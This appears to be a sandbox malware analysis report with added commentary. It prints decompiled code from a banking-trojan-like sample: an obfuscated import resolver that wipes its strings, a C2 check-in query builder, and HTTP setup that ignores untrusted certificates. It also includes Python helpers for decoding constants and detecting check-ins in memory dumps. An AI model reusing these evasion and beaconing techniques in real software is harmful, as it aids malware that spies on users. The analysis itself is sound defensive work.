              • Part of subcall function 00401459: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
            • memset.NTDLL ref: 0040118A
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: Section$CreateViewmemset
            • String ID: @
            • API String ID: 2533685722-2766056989
            • Opcode ID: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
            • Instruction ID: 902b655066e6f1ef2c1749b59dddf7677aeeae3e3ffa194d207bc0e2506ab0da
            • Opcode Fuzzy Hash: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
            • Instruction Fuzzy Hash: 38214DB1D00209AFDB10DFA9C8809EEFBB9FF48314F10453AE616F7250D734AA048B64
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E00401000(void* __edi, intOrPtr _a4) {
            				signed int _v8;
            				intOrPtr* _v12;
            				_Unknown_base(*)()** _v16;
            				signed int _v20;
            				signed short _v24;
            				struct HINSTANCE__* _v28;
            				intOrPtr _t43;
            				intOrPtr* _t45;
            				intOrPtr _t46;
            				struct HINSTANCE__* _t47;
            				intOrPtr* _t49;
            				intOrPtr _t50;
            				signed short _t51;
            				_Unknown_base(*)()* _t53;
            				CHAR* _t54;
            				_Unknown_base(*)()* _t55;
            				void* _t58;
            				signed int _t59;
            				_Unknown_base(*)()* _t60;
            				intOrPtr _t61;
            				intOrPtr _t65;
            				signed int _t68;
            				void* _t69;
            				CHAR* _t71;
            				signed short* _t73;
            
            				_t69 = __edi;
            				_v20 = _v20 & 0x00000000;
            				_t59 =  *0x404180;
            				_t43 =  *((intOrPtr*)(_a4 + _t59 * 8 - 0x18bad598));
            				if(_t43 != 0) {
            					_t45 = _t43 + __edi;
            					_v12 = _t45;
            					_t46 =  *((intOrPtr*)(_t45 + 0xc));
            					if(_t46 != 0) {
            						while(1) {
            							_t71 = _t46 + _t69;
            							_t47 = LoadLibraryA(_t71); // executed
            							_v28 = _t47;
            							if(_t47 == 0) {
            								break;
            							}
            							_v24 = _v24 & 0x00000000;
            							 *_t71 = _t59 - 0x43175ac3;
            							_t49 = _v12;
            							_t61 =  *((intOrPtr*)(_t49 + 0x10));
            							_t50 =  *_t49;
            							if(_t50 != 0) {
            								L6:
            								_t73 = _t50 + _t69;
            								_v16 = _t61 + _t69;
            								while(1) {
            									_t51 =  *_t73;
            									if(_t51 == 0) {
            										break;
            									}
            									if(__eflags < 0) {
            										__eflags = _t51 - _t69;
            										if(_t51 < _t69) {
            											L12:
            											_t21 =  &_v8;
            											 *_t21 = _v8 & 0x00000000;
            											__eflags =  *_t21;
            											_v24 =  *_t73 & 0x0000ffff;
            										} else {
            											_t65 = _a4;
            											__eflags = _t51 -  *((intOrPtr*)(_t65 + 0x50)) + _t69;
            											if(_t51 >=  *((intOrPtr*)(_t65 + 0x50)) + _t69) {
            												goto L12;
            											} else {
            												goto L11;
            											}
            										}
            									} else {
            										_t51 = _t51 + _t69;
            										L11:
            										_v8 = _t51;
            									}
            									_t53 = _v8;
            									__eflags = _t53;
            									if(_t53 == 0) {
            										_t54 = _v24 & 0x0000ffff;
            									} else {
            										_t54 = _t53 + 2;
            									}
            									_t55 = GetProcAddress(_v28, _t54);
            									__eflags = _t55;
            									if(__eflags == 0) {
            										_v20 = _t59 - 0x43175a44;
            									} else {
            										_t68 = _v8;
            										__eflags = _t68;
            										if(_t68 != 0) {
            											 *_t68 = _t59 - 0x43175ac3;
            										}
            										 *_v16 = _t55;
            										_t58 = _t59 * 4 - 0xc5d6b08;
            										_t73 = _t73 + _t58;
            										_t32 =  &_v16;
            										 *_t32 = _v16 + _t58;
            										__eflags =  *_t32;
            										continue;
            									}
            									goto L23;
            								}
            							} else {
            								_t50 = _t61;
            								if(_t61 != 0) {
            									goto L6;
            								}
            							}
            							L23:
            							_v12 = _v12 + 0x14;
            							_t46 =  *((intOrPtr*)(_v12 + 0xc));
            							if(_t46 != 0) {
            								continue;
            							} else {
            							}
            							L26:
            							goto L27;
            						}
            						_t60 = _t59 + 0xbce8a5bb;
            						__eflags = _t60;
            						_v20 = _t60;
            						goto L26;
            					}
            				}
            				L27:
            				return _v20;
            			}

            APIs
            • LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 00401038
            • GetProcAddress.KERNEL32(?,00000000), ref: 004010AA
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: AddressLibraryLoadProc
            • String ID:
            • API String ID: 2574300362-0
            • Opcode ID: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
            • Instruction ID: 069ebb05316bb06cd12a0d66d81b5033da0b120a8bf666a49d589dbfec54084e
            • Opcode Fuzzy Hash: 2dcea5e48fff28511091e29e6b6fdd6310ca7cbb91058c8f3908306a93af5937
            • Instruction Fuzzy Hash: 65314975E0020ADFDB14CF59C980AAAB7F4BF04301B24407AD981FB7A0E779DA81CB58
            Uniqueness

            Uniqueness Score: -1.00%
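E00401000 is the stub's own import resolver. It walks 0x14-byte IMAGE_IMPORT_DESCRIPTOR entries (OriginalFirstThunk at +0, Name at +0xC, FirstThunk at +0x10), calls LoadLibraryA on each DLL name, and for every thunk calls GetProcAddress, treating a thunk with the sign bit set as an ordinal in its low WORD unless the value already lies inside the mapped image, and skipping the 2-byte Hint of IMAGE_IMPORT_BY_NAME (_t53 + 2) for names. None of the structural constants appear literally: each is computed from the global at 0x404180 (_t59), for example `_t59 * 8 - 0x18bad598` to reach the import data directory and `_t59 * 4 - 0xc5d6b08` as the thunk stride, so 0x80, 4 and the Win32 error codes the function returns are absent from the static disassembly. After each successful LoadLibraryA the first byte of the DLL name is overwritten (`*_t71 = _t59 - 0x43175ac3`), and after each GetProcAddress by name the Hint/name start is overwritten (`*_t68 = ...`), which erases the import strings from the image once they have been used. The Python below is an added example, not code from the page or the sample: it recovers the global from two PE32 facts (DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT] is 0x80 bytes into IMAGE_NT_HEADERS32, thunks are 4 bytes apart), evaluates every expression with it, and reproduces the thunk classification. The recovered value is a solution of those constraints, not a value read from the dump.

```python
MASK32 = 0xFFFFFFFF
IMAGE_ORDINAL_FLAG32 = 0x80000000
WIN32_ERRORS = {0x7E: "ERROR_MOD_NOT_FOUND", 0x7F: "ERROR_PROC_NOT_FOUND"}

# The five expressions E00401000 evaluates on the global _t59, keyed by their role.
EXPRESSIONS = {
    "import_dir_offset": lambda g: (g * 8 - 0x18BAD598) & MASK32,  # offset from IMAGE_NT_HEADERS
    "nul_marker":        lambda g: (g - 0x43175AC3) & MASK32,      # written over used strings
    "thunk_stride":      lambda g: (g * 4 - 0x0C5D6B08) & MASK32,  # advance per thunk
    "proc_fail_code":    lambda g: (g - 0x43175A44) & MASK32,      # returned when GetProcAddress fails
    "mod_fail_code":     lambda g: (g + 0xBCE8A5BB) & MASK32,      # returned when LoadLibraryA fails
}


def solve_linear_mod32(a, b, target):
    """All 32-bit g with (a*g + b) mod 2**32 == target, for a power-of-two a."""
    if a <= 0 or a & (a - 1):
        raise ValueError("only power-of-two coefficients are handled")
    rhs = (target - b) & MASK32
    if rhs % a:
        return []
    modulus = (1 << 32) // a          # a distinct solutions, spaced 2**32 / a apart
    return [rhs // a + k * modulus for k in range(a)]


def solve_global():
    """Pin _t59: the import directory must sit at 0x80 and thunks must be 4 bytes
    apart; the byte written over consumed strings being a NUL removes the rest."""
    cands = set(solve_linear_mod32(8, -0x18BAD598, 0x80))
    cands &= set(solve_linear_mod32(4, -0x0C5D6B08, 4))
    cands = sorted(g for g in cands if EXPRESSIONS["nul_marker"](g) == 0)
    if len(cands) != 1:
        raise ValueError(f"expected one solution, got {cands}")
    return cands[0]


def eval_constants(g):
    return {name: expr(g) for name, expr in EXPRESSIONS.items()}


def classify_thunk(thunk, image_base, size_of_image):
    """Mirror the inner loop: no sign bit -> RVA of IMAGE_IMPORT_BY_NAME; sign bit
    set but inside the mapped image -> already an absolute name pointer; otherwise
    an ordinal in the low WORD. For names the returned pointer skips the 2-byte
    Hint, which is what the stub hands to GetProcAddress."""
    thunk &= MASK32
    if not thunk & IMAGE_ORDINAL_FLAG32:
        name_va = (thunk + image_base) & MASK32
    elif image_base <= thunk < image_base + size_of_image:
        name_va = thunk
    else:
        return "ordinal", thunk & 0xFFFF
    return "name", (name_va + 2) & MASK32


if __name__ == "__main__":
    g = solve_global()
    print(f"_t59 = {g:#010x}")
    for name, value in eval_constants(g).items():
        print(f"  {name:18} = {value:#x} {WIN32_ERRORS.get(value, '')}")
```

With the global recovered, the two failure paths read as the standard loader errors (126 when a DLL cannot be loaded, 127 when an export is missing), which is a useful sanity check that the constraints were the right ones: an incorrect solution would not land on meaningful error codes.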

            C-Code - Quality: 68%
            			E00401459(void** __esi, PVOID* _a4) {
            				long _v8;
            				void* _v12;
            				void* _v16;
            				long _t13;
            
            				_v16 = 0;
            				asm("stosd");
            				_v8 = 0;
            				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
            				if(_t13 < 0) {
            					_push(_t13);
            					return __esi[6]();
            				}
            				return 0;
            			}

            APIs
            • NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: SectionView
            • String ID:
            • API String ID: 1323581903-0
            • Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
            • Instruction ID: 2ffffb3a0e1fef12aabb3d262299a14fd526f72662b70b4f27343324966f1358
            • Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
            • Instruction Fuzzy Hash: E9F037B590020CFFDB11DFA5CC85CAFBBBDEB44354B10493AF552E50A0D6309E089B60
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 69%
            			E02023CE0(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
            				intOrPtr _v4;
            				intOrPtr _v8;
            				intOrPtr _v16;
            				intOrPtr _v20;
            				intOrPtr _v24;
            				intOrPtr _v28;
            				intOrPtr _v32;
            				void* _v48;
            				intOrPtr _v56;
            				void* __edi;
            				intOrPtr _t30;
            				void* _t31;
            				intOrPtr _t33;
            				intOrPtr _t34;
            				intOrPtr _t35;
            				intOrPtr _t36;
            				intOrPtr _t37;
            				void* _t40;
            				intOrPtr _t41;
            				int _t44;
            				intOrPtr _t45;
            				int _t48;
            				void* _t49;
            				intOrPtr _t53;
            				intOrPtr _t59;
            				intOrPtr _t63;
            				intOrPtr* _t65;
            				void* _t66;
            				intOrPtr _t71;
            				intOrPtr _t77;
            				intOrPtr _t80;
            				intOrPtr _t83;
            				int _t86;
            				intOrPtr _t88;
            				int _t91;
            				intOrPtr _t93;
            				int _t96;
            				void* _t98;
            				void* _t99;
            				void* _t103;
            				void* _t105;
            				void* _t106;
            				intOrPtr _t107;
            				long _t109;
            				intOrPtr* _t110;
            				intOrPtr* _t111;
            				long _t112;
            				int _t113;
            				void* _t114;
            				void* _t115;
            				void* _t116;
            				void* _t119;
            				void* _t120;
            				void* _t122;
            				void* _t123;
            
            				_t103 = __edx;
            				_t99 = __ecx;
            				_t120 =  &_v16;
            				_t112 = __eax;
            				_t30 =  *0x202a3e0; // 0x2ca9c20
            				_v4 = _t30;
            				_v8 = 8;
            				_t31 = RtlAllocateHeap( *0x202a2d8, 0, 0x800); // executed
            				_t98 = _t31;
            				if(_t98 != 0) {
            					if(_t112 == 0) {
            						_t112 = GetTickCount();
            					}
            					_t33 =  *0x202a018; // 0x1228dd1
            					asm("bswap eax");
            					_t34 =  *0x202a014; // 0x3a87c8cd
            					asm("bswap eax");
            					_t35 =  *0x202a010; // 0xd8d2f808
            					asm("bswap eax");
            					_t36 =  *0x202a00c; // 0x13d015ef
            					asm("bswap eax");
            					_t37 =  *0x202a348; // 0xc7d5a8
            					_t3 = _t37 + 0x202b5ac; // 0x74666f73
            					_t113 = wsprintfA(_t98, _t3, 2, 0x3d18f, _t36, _t35, _t34, _t33,  *0x202a02c,  *0x202a004, _t112);
            					_t40 = E0202467F();
            					_t41 =  *0x202a348; // 0xc7d5a8
            					_t4 = _t41 + 0x202b575; // 0x74707526
            					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
            					_t122 = _t120 + 0x38;
            					_t114 = _t113 + _t44;
            					if(_a12 != 0) {
            						_t93 =  *0x202a348; // 0xc7d5a8
            						_t8 = _t93 + 0x202b508; // 0x732526
            						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
            						_t122 = _t122 + 0xc;
            						_t114 = _t114 + _t96;
            					}
            					_t45 =  *0x202a348; // 0xc7d5a8
            					_t10 = _t45 + 0x202b246; // 0x74636126
            					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
            					_t123 = _t122 + 0xc;
            					_t115 = _t114 + _t48; // executed
            					_t49 = E0202472F(_t99); // executed
            					_t105 = _t49;
            					if(_t105 != 0) {
            						_t88 =  *0x202a348; // 0xc7d5a8
            						_t12 = _t88 + 0x202b8d0; // 0x736e6426
            						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
            						_t123 = _t123 + 0xc;
            						_t115 = _t115 + _t91;
            						HeapFree( *0x202a2d8, 0, _t105);
            					}
            					_t106 = E02021340();
            					if(_t106 != 0) {
            						_t83 =  *0x202a348; // 0xc7d5a8
            						_t14 = _t83 + 0x202b8c5; // 0x6f687726
            						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
            						_t123 = _t123 + 0xc;
            						_t115 = _t115 + _t86;
            						HeapFree( *0x202a2d8, 0, _t106);
            					}
            					_t107 =  *0x202a3cc; // 0x2ca9600
            					_a20 = E02026B59( &E0202A00A, _t107 + 4);
            					_t53 =  *0x202a36c; // 0x2ca95b0
            					_t109 = 0;
            					if(_t53 != 0) {
            						_t80 =  *0x202a348; // 0xc7d5a8
            						_t17 = _t80 + 0x202b8be; // 0x3d736f26
            						wsprintfA(_t115 + _t98, _t17, _t53);
            					}
            					if(_a20 != _t109) {
            						_t116 = RtlAllocateHeap( *0x202a2d8, _t109, 0x800);
            						if(_t116 != _t109) {
            							E02022915(GetTickCount());
            							_t59 =  *0x202a3cc; // 0x2ca9600
            							__imp__(_t59 + 0x40);
            							asm("lock xadd [eax], ecx");
            							_t63 =  *0x202a3cc; // 0x2ca9600
            							__imp__(_t63 + 0x40);
            							_t65 =  *0x202a3cc; // 0x2ca9600
            							_t66 = E02026675(1, _t103, _t98,  *_t65); // executed
            							_t119 = _t66;
            							asm("lock xadd [eax], ecx");
            							if(_t119 != _t109) {
            								StrTrimA(_t119, 0x2029280);
            								_push(_t119);
            								_t71 = E02027563();
            								_v20 = _t71;
            								if(_t71 != _t109) {
            									_t110 = __imp__;
            									 *_t110(_t119, _v8);
            									 *_t110(_t116, _v8);
            									_t111 = __imp__;
            									 *_t111(_t116, _v32);
            									 *_t111(_t116, _t119);
            									_t77 = E020221A6(0xffffffffffffffff, _t116, _v28, _v24); // executed
            									_v56 = _t77;
            									if(_t77 != 0 && _t77 != 0x10d2) {
            										E020263F6();
            									}
            									HeapFree( *0x202a2d8, 0, _v48);
            									_t109 = 0;
            								}
            								HeapFree( *0x202a2d8, _t109, _t119);
            							}
            							RtlFreeHeap( *0x202a2d8, _t109, _t116); // executed
            						}
            						HeapFree( *0x202a2d8, _t109, _a12);
            					}
            					RtlFreeHeap( *0x202a2d8, _t109, _t98); // executed
            				}
            				return _v16;
            			}
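The function above assembles the bot's check-in query string with a chain of wsprintfA calls. Each format-string constant appears in the listing only as the first four bytes of the string it resolves to, read as a little-endian dword: 0x74666f73 is "soft", 0x74707526 is "&upt", 0x732526 is "&%s", 0x74636126 is "&act", 0x736e6426 is "&dns", 0x6f687726 is "&who" and 0x3d736f26 is "&os=". The first call also receives the literals 2 and 0x3d18f (250255), four dwords read from 0x202a00c, 0x202a010, 0x202a014 and 0x202a018 after a `bswap eax` each, two further globals and a GetTickCount value. The following is an added example, not code from the report or from the sample: it reproduces the byte-swap-and-%08x step on the dumped dword values to show that the result is the raw 16-byte ID in memory order, and it scans `strings`-style dump lines for a query whose keys start with the observed prefixes. The full parameter names after those prefixes, the match threshold and the sample dump are assumptions; the scan also assumes the query is visible in cleartext, as in a memory dump taken while the buffer is live, since whatever the sample does to it before the HTTP request is outside this listing.

```python
import struct
from urllib.parse import parse_qsl, urlsplit

# Added example: the dword values and key prefixes below are taken from the
# E02023CE0 listing; the completed parameter names and the sample dump are
# assumptions / constructed test data.

# Words read from 0x202a00c, 0x202a010, 0x202a014, 0x202a018, in the order
# they are passed to wsprintfA after `bswap eax`.
DUMPED_ID_WORDS = (0x13d015ef, 0xd8d2f808, 0x3a87c8cd, 0x1228dd1)

# First bytes of each format-string constant, decoded from the little-endian
# dwords in the listing. "&%s" is a caller-supplied fragment with no fixed
# key and is therefore not matched on.
OBSERVED_KEY_PREFIXES = ("soft", "upt", "act", "dns", "who", "os")


def bswap32(value):
    """Emulate `bswap eax`: reverse the byte order of a 32-bit value."""
    return struct.unpack(">I", struct.pack("<I", value & 0xFFFFFFFF))[0]


def bot_id_hex(words=DUMPED_ID_WORDS):
    """Format the byte-swapped words with %08x each, as the wsprintfA call does.

    Loading a dword little-endian, byte-swapping it and printing it with %08x
    yields the hex of the bytes in memory order, so the result is the raw
    16-byte ID at 0x202a00c as one 32-character hex string.
    """
    return "".join(f"{bswap32(w):08x}" for w in words)


def query_keys(text):
    """Keys of a query string, from a full URL or from a bare `k=v&k=v` string."""
    query = urlsplit(text).query if "?" in text else text
    return [k.lower() for k, _ in parse_qsl(query, keep_blank_values=True)]


def matched_prefixes(text):
    """Which of the observed key prefixes occur as query keys in `text`."""
    keys = query_keys(text)
    return {p for p in OBSERVED_KEY_PREFIXES if any(k.startswith(p) for k in keys)}


def find_checkins(dump_text, min_matches=4):
    """Scan `strings`-style lines for an assembled check-in query.

    Assumes the query is visible in cleartext (e.g. a process memory dump
    taken while the buffer built by E02023CE0 is still live).
    Returns (1-based line number, matched prefixes) for each hit.
    """
    hits = []
    for number, line in enumerate(dump_text.splitlines(), start=1):
        found = matched_prefixes(line.strip())
        if len(found) >= min_matches:
            hits.append((number, found))
    return hits


# Constructed sample dump: line 2 is what the check-in buffer could look like
# if the prefixes were completed as assumed here; lines 1 and 3 are benign.
SAMPLE_STRINGS_DUMP = """\
Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1)
soft=2&version=250255&user=ef15d01308f8d2d8cdc8873ad18d2201&uptime=4242&act=1&dns=host01&whoami=user&os=10.0
https://www.example.com/search?q=soft+drinks&os=android
"""

if __name__ == "__main__":
    print("bot id from dumped words:", bot_id_hex())
    for number, found in find_checkins(SAMPLE_STRINGS_DUMP):
        print(f"line {number}: check-in-like query, matched keys: {sorted(found)}")
```

The threshold of four distinct prefixes is deliberately higher than any single benign query is likely to reach (the third sample line matches only "os"); lower it only if the dump lines are known to be fragments of one buffer.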

            APIs
            • RtlAllocateHeap.NTDLL ref: 02023D08
            • GetTickCount.KERNEL32 ref: 02023D1C
            • wsprintfA.USER32 ref: 02023D6B
            • wsprintfA.USER32 ref: 02023D88
            • wsprintfA.USER32 ref: 02023DA9
            • wsprintfA.USER32 ref: 02023DC1
            • wsprintfA.USER32 ref: 02023DE4
            • HeapFree.KERNEL32(00000000,00000000), ref: 02023DF4
            • wsprintfA.USER32 ref: 02023E16
            • HeapFree.KERNEL32(00000000,00000000), ref: 02023E26
            • wsprintfA.USER32 ref: 02023E5E
            • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02023E79
            • GetTickCount.KERNEL32 ref: 02023E89
            • RtlEnterCriticalSection.NTDLL(02CA95C0), ref: 02023E9D
            • RtlLeaveCriticalSection.NTDLL(02CA95C0), ref: 02023EBB
              • Part of subcall function 02026675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,76B5C740,02023ECE,00000000,02CA9600), ref: 020266A0
              • Part of subcall function 02026675: lstrlen.KERNEL32(00000000,?,76B5C740,02023ECE,00000000,02CA9600), ref: 020266A8
              • Part of subcall function 02026675: strcpy.NTDLL ref: 020266BF
              • Part of subcall function 02026675: lstrcat.KERNEL32(00000000,00000000), ref: 020266CA
              • Part of subcall function 02026675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02023ECE,?,76B5C740,02023ECE,00000000,02CA9600), ref: 020266E7
            • StrTrimA.SHLWAPI(00000000,02029280,00000000,02CA9600), ref: 02023EED
              • Part of subcall function 02027563: lstrlen.KERNEL32(02CA9C10,00000000,00000000,00000000,02023EF9,00000000), ref: 02027573
              • Part of subcall function 02027563: lstrlen.KERNEL32(?), ref: 0202757B
              • Part of subcall function 02027563: lstrcpy.KERNEL32(00000000,02CA9C10), ref: 0202758F
              • Part of subcall function 02027563: lstrcat.KERNEL32(00000000,?), ref: 0202759A
            • lstrcpy.KERNEL32(00000000,?), ref: 02023F0C
            • lstrcpy.KERNEL32(00000000,?), ref: 02023F13
            • lstrcat.KERNEL32(00000000,?), ref: 02023F20
            • lstrcat.KERNEL32(00000000,00000000), ref: 02023F24
              • Part of subcall function 020221A6: WaitForSingleObject.KERNEL32(00000000,746981D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02022258
            • HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 02023F54
            • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02023F64
            • RtlFreeHeap.NTDLL(00000000,00000000,00000000,02CA9600), ref: 02023F72
            • HeapFree.KERNEL32(00000000,?), ref: 02023F83
            • RtlFreeHeap.NTDLL(00000000,00000000), ref: 02023F91
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
            Similarity
            • API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
            • String ID: Uet
            • API String ID: 186568778-2766386878
            • Opcode ID: 618a03f14c641bb7c26f116554a6a6a4abe2115fc7944d7e934ca42610257b81
            • Instruction ID: 15a0784261d7ad4947fbe79d195c7a0d40f473d6ae3ccf076381634a52337d7f
            • Opcode Fuzzy Hash: 618a03f14c641bb7c26f116554a6a6a4abe2115fc7944d7e934ca42610257b81
            • Instruction Fuzzy Hash: 0F71C531A40314AFC7319B69EC88E9777E9FB88704B260927F509D3110DB39D92CDB61
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            C-Code - Quality: 92%
            			E02027B83(void* __eax, void* __ecx, long __esi, char* _a4) {
            				void _v8;
            				long _v12;
            				void _v16;
            				void* _t34;
            				void* _t38;
            				void* _t40;
            				char* _t56;
            				long _t57;
            				void* _t58;
            				intOrPtr _t59;
            				long _t65;
            
            				_t65 = __esi;
            				_t58 = __ecx;
            				_v16 = 0xea60; // 60000 ms; reused below as the send and receive timeout
            				__imp__( *(__esi + 4)); // lstrlen of the request path stored at __esi+4 (see APIs, ref 02027B95)
            				_v12 = __eax + __eax;
            				_t56 = E020233DC(__eax + __eax + 1); // heap buffer of twice the path length plus NUL
            				if(_t56 != 0) {
            					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
            						E020261DA(_t56);
            					} else {
            						E020261DA( *(__esi + 4)); // free the original, keep the canonicalized copy
            						 *(__esi + 4) = _t56;
            					}
            				}
            				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed; _a4 = user agent, 0 = INTERNET_OPEN_TYPE_PRECONFIG, 0x10000000 = INTERNET_FLAG_ASYNC
            				 *(_t65 + 0x10) = _t34;
            				if(_t34 == 0 || InternetSetStatusCallback(_t34, E02027B18) == 0xffffffff) { // E02027B18 is the async status callback
            					L15:
            					return GetLastError();
            				} else {
            					ResetEvent( *(_t65 + 0x1c)); // event signalled by the callback when the async operation completes
            					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed; server name at *_t65, port 80, 3 = INTERNET_SERVICE_HTTP, context = _t65
            					 *(_t65 + 0x14) = _t38;
            					if(_t38 != 0 || GetLastError() == 0x3e5 && E020216B2( *(_t65 + 0x1c), _t58, 0xea60) == 0) { // 0x3e5 = ERROR_IO_PENDING: wait up to 60 s on the event for the async connect
            						_t59 =  *0x202a348; // 0xc7d5a8
            						_t15 = _t59 + 0x202b845; // 0x544547 = "GET"
            						_v8 = 0x84404000;
            						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed; flags = INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_KEEP_CONNECTION | INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS
            						 *(_t65 + 0x18) = _t40;
            						if(_t40 == 0) {
            							goto L15;
            						}
            						_t57 = 4;
            						_v12 = _t57;
            						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) { // 0x1f = INTERNET_OPTION_SECURITY_FLAGS
            							_v8 = _v8 | 0x00000100; // SECURITY_FLAG_IGNORE_UNKNOWN_CA: accept server certificates from untrusted CAs
            							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
            						}
            						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) { // 6 = INTERNET_OPTION_RECEIVE_TIMEOUT, 5 = INTERNET_OPTION_SEND_TIMEOUT, both 60 s
            							goto L15;
            						} else {
            							return 0;
            						}
            					} else {
            						goto L15;
            					}
            				}
            			}

            APIs
            • lstrlen.KERNEL32(?,00000008,74654D40), ref: 02027B95
              • Part of subcall function 020233DC: RtlAllocateHeap.NTDLL(00000000,00000000,020262F6), ref: 020233E8
            • InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 02027BB8
            • InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 02027BE0
            • InternetSetStatusCallback.WININET(00000000,02027B18), ref: 02027BF7
            • ResetEvent.KERNEL32(?), ref: 02027C09
            • InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 02027C1C
            • GetLastError.KERNEL32 ref: 02027C29
            • HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 02027C6F
            • InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 02027C8D
            • InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 02027CAE
            • InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 02027CBA
            • InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 02027CCA
            • GetLastError.KERNEL32 ref: 02027CD4
              • Part of subcall function 020261DA: RtlFreeHeap.NTDLL(00000000,00000000,02026383,00000000,?,00000000,00000000), ref: 020261E6
            Strings
            Memory Dump Source
            • Source File: 00000000.00000002.513748057.0000000002021000.00000020.10000000.00040000.00000000.sdmp, Offset: 02020000, based on PE: true
            • Associated: 00000000.00000002.513739876.0000000002020000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513762541.0000000002029000.00000002.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513771196.000000000202A000.00000004.10000000.00040000.00000000.sdmp
            • Associated: 00000000.00000002.513777122.000000000202C000.00000002.10000000.00040000.00000000.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_2020000_Server.jbxd
